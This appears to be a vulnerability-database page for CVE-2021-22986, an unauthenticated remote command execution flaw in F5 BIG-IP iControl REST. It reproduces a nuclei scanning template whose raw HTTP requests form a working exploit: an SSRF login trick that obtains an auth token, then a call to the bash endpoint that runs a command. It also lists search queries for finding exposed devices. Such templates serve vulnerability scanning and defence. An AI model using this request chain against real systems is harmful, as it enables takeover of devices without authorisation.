Lucene search
K

F5 iControl REST - Remote Command Execution

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 54 Views

F5 iControl REST interface susceptible to remote command execution. Attackers can execute malware, obtain sensitive information, modify data, & gain full control without credentials. Affects BIG-IP 16.0.x, 15.1.x, 14.1.x, 13.1.x, 12.1.x, & BIG-IQ 7.1.0.x, 7.0.0.

Related
Refs
Code
id: CVE-2021-22986

info:
  name: F5 iControl REST - Remote Command Execution
  author: rootxharsh,iamnoooob
  severity: critical
  description: F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the necessary security patches or updates provided by F5 Networks to mitigate the vulnerability.
  reference:
    - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
    - https://support.f5.com/csp/article/K03009991
    - http://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22986
    - https://github.com/Miraitowa70/POC-Notes
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-22986
    cwe-id: CWE-918
    epss-score: 0.99898
    epss-percentile: 0.99963
    cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: f5
    product: big-ip_access_policy_manager
    shodan-query: http.title:"big-ip®-+redirect" +"server"
    fofa-query: title="big-ip®-+redirect" +"server"
    google-query: intitle:"big-ip®-+redirect" +"server"
  tags: cve,cve2021,bigip,rce,kev,packetstorm,f5,vkev,vuln

http:
  - raw:
      - |
        POST /mgmt/shared/authn/login HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Authorization: Basic YWRtaW46
        Content-Type: application/json
        Cookie: BIGIPAuthCookie=1234
        Connection: close

        {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        X-F5-Auth-Token: {{token}}
        Content-Type: application/json
        Connection: close

        {"command":"run","utilCmdArgs":"-c id"}

    matchers:
      - type: word
        words:
          - "commandResult"
          - "uid="
        condition: and

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "([A-Z0-9]{26})"
        internal: true
        part: body

      - type: regex
        group: 1
        regex:
          - "\"commandResult\":\"(.*)\""
        part: body
# digest: 4a0a00473045022100a6cdc3fab137fd41ce38258c8626a0f4d55960011f0f09afb7ea0869d096915402207f7aad7d2243d2b24924ae51c2127a0c17cf5b5da8510c7ff124a9a6fa5ce638:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9High risk
Vulners AI Score9
CVSS 3.19.8
CVSS 210
EPSS0.99898
SSVC
54